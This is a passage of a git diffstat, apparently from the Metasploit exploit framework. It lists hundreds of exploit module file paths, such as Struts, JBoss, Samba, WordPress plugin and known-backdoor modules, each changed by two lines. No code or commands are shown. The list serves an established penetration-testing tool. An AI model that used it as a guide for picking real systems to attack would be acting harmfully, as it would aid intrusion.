.../exploits/linux/http/linksys_wrt110_cmd_exec.rb | 2 +- .../linux/http/linksys_wrt160nv2_apply_exec.rb | 2 +- .../linux/http/linksys_wrt54gl_apply_exec.rb | 2 +- modules/exploits/linux/http/multi_ncc_ping_exec.rb | 2 +- .../exploits/linux/http/mutiny_frontend_upload.rb | 2 +- .../linux/http/netgear_dgn1000b_setup_exec.rb | 2 +- .../linux/http/netgear_dgn2200b_pppoe_exec.rb | 2 +- .../exploits/linux/http/netgear_readynas_exec.rb | 2 +- modules/exploits/linux/http/nginx_chunked_size.rb | 2 +- .../linux/http/openfiler_networkcard_exec.rb | 2 +- modules/exploits/linux/http/pandora_fms_exec.rb | 2 +- modules/exploits/linux/http/pandora_fms_sqli.rb | 2 +- modules/exploits/linux/http/peercast_url.rb | 2 +- .../linux/http/pineapp_ldapsyncnow_exec.rb | 2 +- .../exploits/linux/http/pineapp_livelog_exec.rb | 2 +- .../linux/http/pineapp_test_li_conn_exec.rb | 2 +- modules/exploits/linux/http/piranha_passwd_exec.rb | 2 +- .../linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 2 +- modules/exploits/linux/http/railo_cfml_rfi.rb | 2 +- .../linux/http/realtek_miniigd_upnp_exec_noauth.rb | 2 +- .../linux/http/seagate_nas_php_exec_noauth.rb | 2 +- .../linux/http/smt_ipmi_close_window_bof.rb | 2 +- .../exploits/linux/http/sophos_wpa_iface_exec.rb | 2 +- .../linux/http/sophos_wpa_sblistpack_exec.rb | 2 +- .../linux/http/symantec_web_gateway_exec.rb | 2 +- .../linux/http/symantec_web_gateway_file_upload.rb | 2 +- .../linux/http/symantec_web_gateway_lfi.rb | 2 +- .../linux/http/symantec_web_gateway_pbcontrol.rb | 2 +- .../linux/http/symantec_web_gateway_restore.rb | 2 +- .../http/synology_dsm_sliceupload_exec_noauth.rb | 2 +- .../linux/http/vap2500_tools_command_exec.rb | 2 +- modules/exploits/linux/http/vcms_upload.rb | 2 +- modules/exploits/linux/http/wanem_exec.rb | 2 +- .../linux/http/webcalendar_settings_exec.rb | 2 +- modules/exploits/linux/http/webid_converter.rb | 2 +- modules/exploits/linux/http/zabbix_sqli.rb | 2 +- .../exploits/linux/http/zen_load_balancer_exec.rb | 2 +- .../linux/http/zenoss_showdaemonxmlconfig_exec.rb | 2 +- .../linux/ids/alienvault_centerd_soap_exec.rb | 2 +- modules/exploits/linux/ids/snortbopre.rb | 2 +- modules/exploits/linux/imap/imap_uw_lsub.rb | 2 +- .../linux/local/desktop_privilege_escalation.rb | 2 +- modules/exploits/linux/local/hp_smhstart.rb | 2 +- modules/exploits/linux/local/kloxo_lxsuexec.rb | 2 +- modules/exploits/linux/local/pkexec.rb | 2 +- modules/exploits/linux/local/sock_sendpage.rb | 2 +- .../exploits/linux/local/sophos_wpa_clear_keys.rb | 2 +- modules/exploits/linux/local/udev_netlink.rb | 2 +- modules/exploits/linux/local/vmware_mount.rb | 2 +- modules/exploits/linux/local/zpanel_zsudo.rb | 2 +- .../exploits/linux/misc/accellion_fta_mpipe2.rb | 2 +- modules/exploits/linux/misc/drb_remote_codeexec.rb | 2 +- modules/exploits/linux/misc/gld_postfix.rb | 2 +- modules/exploits/linux/misc/hikvision_rtsp_bof.rb | 2 +- .../linux/misc/hp_data_protector_cmd_exec.rb | 2 +- modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb | 2 +- modules/exploits/linux/misc/hp_vsa_login_bof.rb | 2 +- modules/exploits/linux/misc/hplip_hpssd_exec.rb | 2 +- modules/exploits/linux/misc/ib_inet_connect.rb | 2 +- .../exploits/linux/misc/ib_jrd8_create_database.rb | 2 +- modules/exploits/linux/misc/ib_open_marker_file.rb | 2 +- modules/exploits/linux/misc/ib_pwd_db_aliased.rb | 2 +- .../linux/misc/jenkins_java_deserialize.rb | 2 +- modules/exploits/linux/misc/lprng_format_string.rb | 2 +- .../exploits/linux/misc/mongod_native_helper.rb | 2 +- .../exploits/linux/misc/nagios_nrpe_arguments.rb | 2 +- .../linux/misc/netsupport_manager_agent.rb | 2 +- .../linux/misc/novell_edirectory_ncp_bof.rb | 2 +- modules/exploits/linux/misc/sercomm_exec.rb | 2 +- modules/exploits/linux/misc/zabbix_server_exec.rb | 2 +- .../exploits/linux/mysql/mysql_yassl_getname.rb | 2 +- modules/exploits/linux/mysql/mysql_yassl_hello.rb | 2 +- .../linux/pop3/cyrus_pop3d_popsubfolders.rb | 2 +- .../exploits/linux/postgres/postgres_payload.rb | 2 +- .../exploits/linux/pptp/poptop_negative_read.rb | 2 +- .../linux/proxy/squid_ntlm_authenticate.rb | 2 +- modules/exploits/linux/samba/chain_reply.rb | 2 +- .../exploits/linux/samba/lsa_transnames_heap.rb | 2 +- modules/exploits/linux/samba/setinfopolicy_heap.rb | 2 +- modules/exploits/linux/samba/trans2open.rb | 2 +- modules/exploits/linux/smtp/exim4_dovecot_exec.rb | 2 +- .../exploits/linux/smtp/exim_gethostbyname_bof.rb | 2 +- .../linux/ssh/ceragon_fibeair_known_privkey.rb | 2 +- .../exploits/linux/ssh/f5_bigip_known_privkey.rb | 2 +- .../loadbalancerorg_enterprise_known_privkey.rb | 2 +- .../linux/ssh/quantum_dxi_known_privkey.rb | 2 +- .../exploits/linux/ssh/quantum_vmpro_backdoor.rb | 2 +- modules/exploits/linux/ssh/symantec_smg_ssh.rb | 2 +- .../exploits/linux/telnet/telnet_encrypt_keyid.rb | 2 +- .../exploits/linux/upnp/dlink_upnp_msearch_exec.rb | 2 +- modules/exploits/linux/upnp/miniupnpd_soap_bof.rb | 2 +- .../multi/browser/adobe_flash_hacking_team_uaf.rb | 2 +- .../multi/browser/adobe_flash_nellymoser_bof.rb | 2 +- .../adobe_flash_net_connection_confusion.rb | 2 +- .../browser/adobe_flash_opaque_background_uaf.rb | 2 +- .../multi/browser/adobe_flash_pixel_bender_bof.rb | 2 +- .../browser/adobe_flash_shader_drawing_fill.rb | 2 +- .../browser/adobe_flash_shader_job_overflow.rb | 2 +- .../browser/adobe_flash_uncompress_zlib_uaf.rb | 2 +- .../multi/browser/firefox_escape_retval.rb | 2 +- .../browser/firefox_pdfjs_privilege_escalation.rb | 2 +- .../multi/browser/firefox_proto_crmfrequest.rb | 2 +- .../multi/browser/firefox_proxy_prototype.rb | 2 +- .../multi/browser/firefox_queryinterface.rb | 2 +- .../exploits/multi/browser/firefox_svg_plugin.rb | 2 +- .../browser/firefox_tostring_console_injection.rb | 2 +- .../multi/browser/firefox_webidl_injection.rb | 2 +- .../browser/firefox_xpi_bootstrapped_addon.rb | 2 +- modules/exploits/multi/browser/itms_overflow.rb | 2 +- .../multi/browser/java_atomicreferencearray.rb | 2 +- .../multi/browser/java_calendar_deserialize.rb | 2 +- .../multi/browser/java_getsoundbank_bof.rb | 2 +- .../multi/browser/java_jre17_driver_manager.rb | 2 +- modules/exploits/multi/browser/java_jre17_exec.rb | 2 +- ...va_jre17_glassfish_averagerangestatisticimpl.rb | 2 +- modules/exploits/multi/browser/java_jre17_jaxws.rb | 2 +- .../exploits/multi/browser/java_jre17_jmxbean.rb | 2 +- .../exploits/multi/browser/java_jre17_jmxbean_2.rb | 2 +- .../multi/browser/java_jre17_method_handle.rb | 2 +- .../multi/browser/java_jre17_provider_skeleton.rb | 2 +- .../multi/browser/java_jre17_reflection_types.rb | 2 +- modules/exploits/multi/browser/java_rhino.rb | 2 +- .../multi/browser/java_rmi_connection_impl.rb | 2 +- .../exploits/multi/browser/java_setdifficm_bof.rb | 2 +- .../exploits/multi/browser/java_signed_applet.rb | 2 +- .../exploits/multi/browser/java_storeimagearray.rb | 2 +- .../exploits/multi/browser/java_trusted_chain.rb | 2 +- .../multi/browser/java_verifier_field_access.rb | 2 +- .../exploits/multi/browser/mozilla_compareto.rb | 2 +- .../multi/browser/mozilla_navigatorjava.rb | 2 +- .../multi/browser/opera_configoverwrite.rb | 2 +- .../exploits/multi/browser/opera_historysearch.rb | 2 +- modules/exploits/multi/browser/qtjava_pointer.rb | 2 +- .../multi/elasticsearch/script_mvel_rce.rb | 2 +- .../multi/elasticsearch/search_groovy_script.rb | 2 +- .../multi/fileformat/adobe_u3d_meshcont.rb | 2 +- .../multi/fileformat/js_unpacker_eval_injection.rb | 2 +- modules/exploits/multi/fileformat/maple_maplet.rb | 2 +- .../fileformat/nodejs_js_yaml_load_code_exec.rb | 2 +- .../multi/fileformat/peazip_command_injection.rb | 2 +- .../exploits/multi/ftp/pureftpd_bash_env_exec.rb | 2 +- .../exploits/multi/ftp/wuftpd_site_exec_format.rb | 2 +- modules/exploits/multi/gdb/gdb_server_exec.rb | 2 +- modules/exploits/multi/handler.rb | 2 +- modules/exploits/multi/http/activecollab_chat.rb | 2 +- .../multi/http/ajaxplorer_checkinstall_exec.rb | 2 +- .../multi/http/apache_mod_cgi_bash_env_exec.rb | 2 +- .../multi/http/apache_roller_ognl_injection.rb | 2 +- modules/exploits/multi/http/apprain_upload_exec.rb | 2 +- modules/exploits/multi/http/atutor_sqli.rb | 2 +- .../exploits/multi/http/auxilium_upload_exec.rb | 2 +- modules/exploits/multi/http/axis2_deployer.rb | 2 +- modules/exploits/multi/http/bolt_file_upload.rb | 2 +- .../multi/http/caidao_php_backdoor_exec.rb | 2 +- modules/exploits/multi/http/cisco_dcnm_upload.rb | 2 +- modules/exploits/multi/http/coldfusion_rds.rb | 2 +- modules/exploits/multi/http/cups_bash_env_exec.rb | 2 +- .../exploits/multi/http/cuteflow_upload_exec.rb | 2 +- .../multi/http/dexter_casinoloader_exec.rb | 2 +- modules/exploits/multi/http/drupal_drupageddon.rb | 2 +- modules/exploits/multi/http/eaton_nsm_code_exec.rb | 2 +- .../exploits/multi/http/eventlog_file_upload.rb | 2 +- .../exploits/multi/http/extplorer_upload_exec.rb | 2 +- modules/exploits/multi/http/familycms_less_exec.rb | 2 +- modules/exploits/multi/http/freenas_exec_raw.rb | 2 +- modules/exploits/multi/http/gestioip_exec.rb | 2 +- .../exploits/multi/http/git_client_command_exec.rb | 2 +- modules/exploits/multi/http/gitlab_shell_exec.rb | 2 +- modules/exploits/multi/http/gitorious_graph.rb | 2 +- modules/exploits/multi/http/glassfish_deployer.rb | 2 +- .../exploits/multi/http/glossword_upload_exec.rb | 2 +- modules/exploits/multi/http/glpi_install_rce.rb | 2 +- modules/exploits/multi/http/horde_href_backdoor.rb | 2 +- .../multi/http/hp_sitescope_issuesiebelcmd.rb | 2 +- .../multi/http/hp_sitescope_uploadfileshandler.rb | 2 +- modules/exploits/multi/http/hp_sys_mgmt_exec.rb | 2 +- .../multi/http/hyperic_hq_script_console.rb | 2 +- modules/exploits/multi/http/ispconfig_php_exec.rb | 2 +- modules/exploits/multi/http/jboss_bshdeployer.rb | 2 +- .../multi/http/jboss_deploymentfilerepository.rb | 2 +- modules/exploits/multi/http/jboss_invoke_deploy.rb | 2 +- modules/exploits/multi/http/jboss_maindeployer.rb | 2 +- .../exploits/multi/http/jboss_seam_upload_exec.rb | 2 +- .../exploits/multi/http/jenkins_script_console.rb | 2 +- .../exploits/multi/http/jira_hipchat_template.rb | 2 +- .../exploits/multi/http/joomla_http_header_rce.rb | 2 +- .../exploits/multi/http/kordil_edms_upload_exec.rb | 2 +- modules/exploits/multi/http/lcms_php_exec.rb | 2 +- .../multi/http/log1cms_ajax_create_folder.rb | 2 +- .../multi/http/manage_engine_dc_pmp_sqli.rb | 2 +- .../multi/http/manageengine_auth_upload.rb | 2 +- .../multi/http/manageengine_sd_uploader.rb | 2 +- .../multi/http/manageengine_search_sqli.rb | 2 +- modules/exploits/multi/http/mantisbt_php_exec.rb | 2 +- modules/exploits/multi/http/mediawiki_thumb.rb | 2 +- modules/exploits/multi/http/mma_backdoor_upload.rb | 2 +- .../multi/http/mobilecartly_upload_exec.rb | 2 +- modules/exploits/multi/http/moodle_cmd_exec.rb | 2 +- .../multi/http/movabletype_upgrade_exec.rb | 2 +- .../exploits/multi/http/mutiny_subnetmask_exec.rb | 2 +- modules/exploits/multi/http/nas4free_php_exec.rb | 2 +- .../exploits/multi/http/netwin_surgeftp_exec.rb | 2 +- .../exploits/multi/http/nibbleblog_file_upload.rb | 2 +- modules/exploits/multi/http/op5_license.rb | 2 +- modules/exploits/multi/http/op5_welcome.rb | 2 +- .../exploits/multi/http/openfire_auth_bypass.rb | 2 +- .../exploits/multi/http/openmediavault_cmd_exec.rb | 2 +- modules/exploits/multi/http/openx_backdoor_php.rb | 2 +- .../multi/http/opmanager_socialit_file_upload.rb | 2 +- modules/exploits/multi/http/oracle_reports_rce.rb | 2 +- modules/exploits/multi/http/pandora_upload_exec.rb | 2 +- .../exploits/multi/http/php_cgi_arg_injection.rb | 2 +- .../multi/http/php_volunteer_upload_exec.rb | 2 +- modules/exploits/multi/http/phpfilemanager_rce.rb | 2 +- .../multi/http/phpldapadmin_query_engine.rb | 2 +- modules/exploits/multi/http/phpmoadmin_exec.rb | 2 +- .../multi/http/phpmyadmin_3522_backdoor.rb | 2 +- .../exploits/multi/http/phpmyadmin_preg_replace.rb | 2 +- .../multi/http/phpscheduleit_start_date.rb | 2 +- modules/exploits/multi/http/phptax_exec.rb | 2 +- .../exploits/multi/http/phpwiki_ploticus_exec.rb | 2 +- modules/exploits/multi/http/plone_popen2.rb | 2 +- modules/exploits/multi/http/pmwiki_pagelist.rb | 2 +- .../exploits/multi/http/polarcms_upload_exec.rb | 2 +- modules/exploits/multi/http/processmaker_exec.rb | 2 +- modules/exploits/multi/http/qdpm_upload_exec.rb | 2 +- .../multi/http/rails_json_yaml_code_exec.rb | 2 +- .../multi/http/rails_secret_deserialization.rb | 2 +- .../multi/http/rails_xml_yaml_code_exec.rb | 2 +- .../http/rocket_servergraph_file_requestor_rce.rb | 2 +- modules/exploits/multi/http/sflog_upload_exec.rb | 2 +- .../exploits/multi/http/simple_backdoors_exec.rb | 2 +- modules/exploits/multi/http/sit_file_upload.rb | 2 +- modules/exploits/multi/http/snortreport_exec.rb | 2 +- .../http/solarwinds_store_manager_auth_filter.rb | 2 +- .../exploits/multi/http/sonicwall_gms_upload.rb | 2 +- modules/exploits/multi/http/splunk_mappy_exec.rb | 2 +- .../exploits/multi/http/splunk_upload_app_exec.rb | 2 +- modules/exploits/multi/http/spree_search_exec.rb | 2 +- .../exploits/multi/http/spree_searchlogic_exec.rb | 2 +- modules/exploits/multi/http/struts_code_exec.rb | 2 +- .../multi/http/struts_code_exec_classloader.rb | 2 +- .../http/struts_code_exec_exception_delegator.rb | 2 +- .../multi/http/struts_code_exec_parameters.rb | 2 +- .../multi/http/struts_default_action_mapper.rb | 2 +- modules/exploits/multi/http/struts_dev_mode.rb | 2 +- .../exploits/multi/http/struts_include_params.rb | 2 +- modules/exploits/multi/http/stunshell_eval.rb | 2 +- modules/exploits/multi/http/stunshell_exec.rb | 2 +- .../exploits/multi/http/sun_jsws_dav_options.rb | 2 +- .../exploits/multi/http/sysaid_auth_file_upload.rb | 2 +- .../multi/http/sysaid_rdslogs_file_upload.rb | 2 +- .../exploits/multi/http/testlink_upload_exec.rb | 2 +- modules/exploits/multi/http/tomcat_mgr_deploy.rb | 2 +- modules/exploits/multi/http/tomcat_mgr_upload.rb | 2 +- modules/exploits/multi/http/traq_plugin_exec.rb | 2 +- .../exploits/multi/http/uptime_file_upload_1.rb | 2 +- .../exploits/multi/http/uptime_file_upload_2.rb | 2 +- modules/exploits/multi/http/v0pcr3w_exec.rb | 2 +- modules/exploits/multi/http/vbseo_proc_deutf.rb | 2 +- .../exploits/multi/http/vbulletin_unserialize.rb | 2 +- .../multi/http/visual_mining_netcharts_upload.rb | 2 +- modules/exploits/multi/http/vtiger_install_rce.rb | 2 +- modules/exploits/multi/http/vtiger_php_exec.rb | 2 +- modules/exploits/multi/http/vtiger_soap_upload.rb | 2 +- .../exploits/multi/http/webpagetest_upload_exec.rb | 2 +- modules/exploits/multi/http/werkzeug_debug_rce.rb | 2 +- modules/exploits/multi/http/wikka_spam_exec.rb | 2 +- modules/exploits/multi/http/x7chat2_php_exec.rb | 2 +- modules/exploits/multi/http/zabbix_script_exec.rb | 2 +- modules/exploits/multi/http/zemra_panel_rce.rb | 2 +- .../zenworks_configuration_management_upload.rb | 2 +- .../multi/http/zenworks_control_center_upload.rb | 2 +- .../http/zpanel_information_disclosure_rce.rb | 2 +- modules/exploits/multi/ids/snort_dce_rpc.rb | 2 +- modules/exploits/multi/misc/arkeia_agent_exec.rb | 2 +- modules/exploits/multi/misc/batik_svg_java.rb | 2 +- .../multi/misc/hp_data_protector_exec_integutil.rb | 2 +- modules/exploits/multi/misc/hp_vsa_exec.rb | 2 +- .../exploits/multi/misc/indesign_server_soap.rb | 2 +- modules/exploits/multi/misc/java_jdwp_debugger.rb | 2 +- modules/exploits/multi/misc/java_jmx_server.rb | 2 +- modules/exploits/multi/misc/java_rmi_server.rb | 2 +- modules/exploits/multi/misc/legend_bot_exec.rb | 2 +- .../exploits/multi/misc/openview_omniback_exec.rb | 2 +- modules/exploits/multi/misc/pbot_exec.rb | 2 +- .../multi/misc/persistent_hpca_radexec_exec.rb | 2 +- modules/exploits/multi/misc/ra1nx_pubcall_exec.rb | 2 +- .../multi/misc/veritas_netbackup_cmdexec.rb | 2 +- modules/exploits/multi/misc/w3tw0rk_exec.rb | 2 +- .../multi/misc/wireshark_lwres_getaddrbyname.rb | 2 +- .../misc/wireshark_lwres_getaddrbyname_loop.rb | 2 +- modules/exploits/multi/misc/xdh_x_exec.rb | 2 +- modules/exploits/multi/misc/zend_java_bridge.rb | 2 +- modules/exploits/multi/ntp/ntp_overflow.rb | 2 +- .../multi/php/php_unserialize_zval_cookie.rb | 2 +- modules/exploits/multi/realserver/describe.rb | 2 +- modules/exploits/multi/samba/nttrans.rb | 2 +- modules/exploits/multi/samba/usermap_script.rb | 2 +- .../multi/sap/sap_mgmt_con_osexec_payload.rb | 2 +- .../sap/sap_soap_rfc_sxpg_call_system_exec.rb | 2 +- .../multi/sap/sap_soap_rfc_sxpg_command_exec.rb | 2 +- modules/exploits/multi/script/web_delivery.rb | 2 +- modules/exploits/multi/ssh/sshexec.rb | 2 +- modules/exploits/multi/svn/svnserve_date.rb | 2 +- .../exploits/multi/upnp/libupnp_ssdp_overflow.rb | 2 +- modules/exploits/multi/vnc/vnc_keyboard_exec.rb | 2 +- modules/exploits/multi/vpn/tincd_bof.rb | 2 +- .../exploits/multi/wyse/hagent_untrusted_hsdata.rb | 2 +- modules/exploits/netware/smb/lsass_cifs.rb | 2 +- modules/exploits/netware/sunrpc/pkernel_callit.rb | 2 +- modules/exploits/osx/afp/loginext.rb | 2 +- modules/exploits/osx/arkeia/type77.rb | 2 +- modules/exploits/osx/browser/mozilla_mchannel.rb | 2 +- modules/exploits/osx/browser/safari_file_policy.rb | 2 +- .../osx/browser/safari_metadata_archive.rb | 2 +- .../safari_user_assisted_applescript_exec.rb | 2 +- .../safari_user_assisted_download_launch.rb | 2 +- modules/exploits/osx/browser/software_update.rb | 2 +- modules/exploits/osx/email/mailapp_image_exec.rb | 2 +- modules/exploits/osx/ftp/webstar_ftp_user.rb | 2 +- modules/exploits/osx/http/evocam_webserver.rb | 2 +- .../exploits/osx/local/dyld_print_to_file_root.rb | 2 +- modules/exploits/osx/local/iokit_keyboard_root.rb | 2 +- modules/exploits/osx/local/nfs_mount_root.rb | 2 +- modules/exploits/osx/local/persistence.rb | 2 +- modules/exploits/osx/local/rootpipe.rb | 2 +- .../exploits/osx/local/rootpipe_entitlements.rb | 2 +- modules/exploits/osx/local/rsh_libmalloc.rb | 2 +- modules/exploits/osx/local/setuid_tunnelblick.rb | 2 +- modules/exploits/osx/local/setuid_viscosity.rb | 2 +- modules/exploits/osx/local/sudo_password_bypass.rb | 2 +- modules/exploits/osx/local/tpwn.rb | 2 +- .../osx/local/vmware_bash_function_root.rb | 2 +- modules/exploits/osx/mdns/upnp_location.rb | 2 +- modules/exploits/osx/misc/ufo_ai.rb | 2 +- .../osx/rtsp/quicktime_rtsp_content_type.rb | 2 +- modules/exploits/osx/samba/lsa_transnames_heap.rb | 2 +- modules/exploits/osx/samba/trans2open.rb | 2 +- modules/exploits/solaris/dtspcd/heap_noir.rb | 2 +- modules/exploits/solaris/lpd/sendmail_exec.rb | 2 +- .../exploits/solaris/samba/lsa_transnames_heap.rb | 2 +- modules/exploits/solaris/samba/trans2open.rb | 2 +- .../solaris/sunrpc/sadmind_adm_build_path.rb | 2 +- modules/exploits/solaris/sunrpc/sadmind_exec.rb | 2 +- modules/exploits/solaris/sunrpc/ypupdated_exec.rb | 2 +- modules/exploits/solaris/telnet/fuser.rb | 2 +- modules/exploits/solaris/telnet/ttyprompt.rb | 2 +- modules/exploits/unix/dhcp/bash_environment.rb | 2 +- modules/exploits/unix/ftp/proftpd_133c_backdoor.rb | 2 +- modules/exploits/unix/ftp/proftpd_modcopy_exec.rb | 2 +- modules/exploits/unix/ftp/vsftpd_234_backdoor.rb | 2 +- .../unix/http/contentkeeperweb_mimencode.rb | 2 +- modules/exploits/unix/http/ctek_skyrouter.rb | 2 +- modules/exploits/unix/http/freepbx_callmenum.rb | 2 +- modules/exploits/unix/http/lifesize_room.rb | 2 +- modules/exploits/unix/http/twiki_debug_plugins.rb | 2 +- .../unix/http/vmturbo_vmtadmin_exec_noauth.rb | 2 +- .../exploits/unix/irc/unreal_ircd_3281_backdoor.rb | 2 +- modules/exploits/unix/local/chkrootkit.rb | 2 +- modules/exploits/unix/local/setuid_nmap.rb | 2 +- modules/exploits/unix/misc/distcc_exec.rb | 2 +- modules/exploits/unix/misc/qnx_qconn_exec.rb | 2 +- modules/exploits/unix/misc/spamassassin_exec.rb | 2 +- modules/exploits/unix/misc/xerox_mfp.rb | 2 +- modules/exploits/unix/misc/zabbix_agent_exec.rb | 2 +- .../exploits/unix/smtp/clamav_milter_blackhole.rb | 2 +- modules/exploits/unix/smtp/exim4_string_format.rb | 2 +- .../unix/ssh/array_vxag_vapv_privkey_privesc.rb | 2 +- .../exploits/unix/ssh/tectia_passwd_changereq.rb | 2 +- .../unix/webapp/actualanalyzer_ant_cookie_exec.rb | 2 +- modules/exploits/unix/webapp/arkeia_upload_exec.rb | 2 +- .../exploits/unix/webapp/awstats_configdir_exec.rb | 2 +- .../exploits/unix/webapp/awstats_migrate_exec.rb | 2 +- .../unix/webapp/awstatstotals_multisort.rb | 2 +- modules/exploits/unix/webapp/barracuda_img_exec.rb | 2 +- modules/exploits/unix/webapp/base_qry_common.rb | 2 +- modules/exploits/unix/webapp/basilic_diff_exec.rb | 2 +- .../exploits/unix/webapp/cacti_graphimage_exec.rb | 2 +- .../unix/webapp/cakephp_cache_corruption.rb | 2 +- .../exploits/unix/webapp/carberp_backdoor_exec.rb | 2 +- .../unix/webapp/citrix_access_gateway_exec.rb | 2 +- .../exploits/unix/webapp/clipbucket_upload_exec.rb | 2 +- .../exploits/unix/webapp/coppermine_piceditor.rb | 2 +- .../exploits/unix/webapp/datalife_preview_exec.rb | 2 +- modules/exploits/unix/webapp/dogfood_spell_exec.rb | 2 +- .../exploits/unix/webapp/egallery_upload_exec.rb | 2 +- .../exploits/unix/webapp/flashchat_upload_exec.rb | 2 +- modules/exploits/unix/webapp/foswiki_maketext.rb | 2 +- .../exploits/unix/webapp/freepbx_config_exec.rb | 2 +- modules/exploits/unix/webapp/generic_exec.rb | 2 +- .../unix/webapp/get_simple_cms_upload_exec.rb | 2 +- .../unix/webapp/google_proxystylesheet_exec.rb | 2 +- .../exploits/unix/webapp/graphite_pickle_exec.rb | 2 +- modules/exploits/unix/webapp/guestbook_ssi_exec.rb | 2 +- modules/exploits/unix/webapp/hastymail_exec.rb | 2 +- .../exploits/unix/webapp/havalite_upload_exec.rb | 2 +- .../exploits/unix/webapp/horde_unserialize_exec.rb | 2 +- .../unix/webapp/hybridauth_install_php_exec.rb | 2 +- modules/exploits/unix/webapp/instantcms_exec.rb | 2 +- .../webapp/invision_pboard_unserialize_exec.rb | 2 +- .../unix/webapp/joomla_akeeba_unserialize.rb | 2 +- .../unix/webapp/joomla_comjce_imgmanager.rb | 2 +- .../unix/webapp/joomla_contenthistory_sqli_rce.rb | 2 +- .../unix/webapp/joomla_media_upload_exec.rb | 2 +- modules/exploits/unix/webapp/joomla_tinybrowser.rb | 2 +- modules/exploits/unix/webapp/kimai_sqli.rb | 2 +- .../exploits/unix/webapp/libretto_upload_exec.rb | 2 +- .../unix/webapp/maarch_letterbox_file_upload.rb | 2 +- modules/exploits/unix/webapp/mambo_cache_lite.rb | 2 +- modules/exploits/unix/webapp/mitel_awc_exec.rb | 2 +- modules/exploits/unix/webapp/moinmoin_twikidraw.rb | 2 +- modules/exploits/unix/webapp/mybb_backdoor.rb | 2 +- .../exploits/unix/webapp/nagios3_history_cgi.rb | 2 +- .../exploits/unix/webapp/nagios3_statuswml_ping.rb | 2 +- .../exploits/unix/webapp/nagios_graph_explorer.rb | 2 +- .../exploits/unix/webapp/narcissus_backend_exec.rb | 2 +- .../unix/webapp/open_flash_chart_upload_exec.rb | 2 +- .../unix/webapp/openemr_sqli_privesc_upload.rb | 2 +- .../exploits/unix/webapp/openemr_upload_exec.rb | 2 +- .../exploits/unix/webapp/opensis_modname_exec.rb | 2 +- .../unix/webapp/openview_connectednodes_exec.rb | 2 +- modules/exploits/unix/webapp/openx_banner_edit.rb | 2 +- .../exploits/unix/webapp/oracle_vm_agent_utl.rb | 2 +- .../exploits/unix/webapp/oscommerce_filemanager.rb | 2 +- modules/exploits/unix/webapp/pajax_remote_exec.rb | 2 +- modules/exploits/unix/webapp/php_charts_exec.rb | 2 +- modules/exploits/unix/webapp/php_eval.rb | 2 +- modules/exploits/unix/webapp/php_include.rb | 2 +- .../exploits/unix/webapp/php_vbulletin_template.rb | 2 +- modules/exploits/unix/webapp/php_xmlrpc_eval.rb | 2 +- modules/exploits/unix/webapp/phpbb_highlight.rb | 2 +- modules/exploits/unix/webapp/phpmyadmin_config.rb | 2 +- .../unix/webapp/projectpier_upload_exec.rb | 2 +- .../unix/webapp/projectsend_upload_exec.rb | 2 +- .../exploits/unix/webapp/qtss_parse_xml_exec.rb | 2 +- modules/exploits/unix/webapp/redmine_scm_exec.rb | 2 +- modules/exploits/unix/webapp/seportal_sqli_exec.rb | 2 +- .../unix/webapp/simple_e_document_upload_exec.rb | 2 +- .../webapp/sixapart_movabletype_storable_exec.rb | 2 +- modules/exploits/unix/webapp/skybluecanvas_exec.rb | 2 +- .../exploits/unix/webapp/sphpblog_file_upload.rb | 2 +- modules/exploits/unix/webapp/spip_connect_exec.rb | 2 +- modules/exploits/unix/webapp/squash_yaml_exec.rb | 2 +- .../unix/webapp/squirrelmail_pgp_plugin.rb | 2 +- .../unix/webapp/sugarcrm_unserialize_exec.rb | 2 +- .../unix/webapp/tikiwiki_graph_formula_exec.rb | 2 +- modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb | 2 +- .../unix/webapp/tikiwiki_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/trixbox_langchoice.rb | 2 +- .../unix/webapp/tuleap_unserialize_exec.rb | 2 +- modules/exploits/unix/webapp/twiki_history.rb | 2 +- modules/exploits/unix/webapp/twiki_maketext.rb | 2 +- modules/exploits/unix/webapp/twiki_search.rb | 2 +- .../unix/webapp/vbulletin_vote_sqli_exec.rb | 2 +- .../unix/webapp/vicidial_manager_send_cmd_exec.rb | 2 +- .../exploits/unix/webapp/webmin_show_cgi_exec.rb | 2 +- modules/exploits/unix/webapp/webtester_exec.rb | 2 +- .../exploits/unix/webapp/wp_admin_shell_upload.rb | 2 +- .../unix/webapp/wp_advanced_custom_fields_exec.rb | 2 +- .../unix/webapp/wp_ajax_load_more_file_upload.rb | 2 +- .../unix/webapp/wp_asset_manager_upload_exec.rb | 2 +- .../webapp/wp_creativecontactform_file_upload.rb | 2 +- .../unix/webapp/wp_downloadmanager_upload.rb | 2 +- .../webapp/wp_easycart_unrestricted_file_upload.rb | 2 +- .../exploits/unix/webapp/wp_foxypress_upload.rb | 2 +- .../unix/webapp/wp_frontend_editor_file_upload.rb | 2 +- .../webapp/wp_google_document_embedder_exec.rb | 2 +- .../unix/webapp/wp_holding_pattern_file_upload.rb | 2 +- .../webapp/wp_inboundio_marketing_file_upload.rb | 2 +- .../exploits/unix/webapp/wp_infusionsoft_upload.rb | 2 +- modules/exploits/unix/webapp/wp_lastpost_exec.rb | 2 +- .../unix/webapp/wp_nmediawebsite_file_upload.rb | 2 +- .../unix/webapp/wp_optimizepress_upload.rb | 2 +- .../wp_photo_gallery_unrestricted_file_upload.rb | 2 +- .../unix/webapp/wp_pixabay_images_upload.rb | 2 +- modules/exploits/unix/webapp/wp_platform_exec.rb | 2 +- .../unix/webapp/wp_property_upload_exec.rb | 2 +- .../unix/webapp/wp_reflexgallery_file_upload.rb | 2 +- .../unix/webapp/wp_revslider_upload_execute.rb | 2 +- .../unix/webapp/wp_slideshowgallery_upload.rb | 2 +- .../unix/webapp/wp_symposium_shell_upload.rb | 2 +- .../exploits/unix/webapp/wp_total_cache_exec.rb | 2 +- .../exploits/unix/webapp/wp_worktheflow_upload.rb | 2 +- .../unix/webapp/wp_wpshop_ecommerce_file_upload.rb | 2 +- .../exploits/unix/webapp/wp_wptouch_file_upload.rb | 2 +- .../unix/webapp/wp_wysija_newsletters_upload.rb | 2 +- modules/exploits/unix/webapp/xoda_file_upload.rb | 2 +- modules/exploits/unix/webapp/zeroshell_exec.rb | 2 +- modules/exploits/unix/webapp/zimbra_lfi.rb | 2 +- .../unix/webapp/zoneminder_packagecontrol_exec.rb | 2 +- .../exploits/unix/webapp/zpanel_username_exec.rb | 2 +- modules/exploits/unix/x11/x11_keyboard_exec.rb | 2 +- modules/exploits/windows/antivirus/ams_hndlrsvc.rb | 2 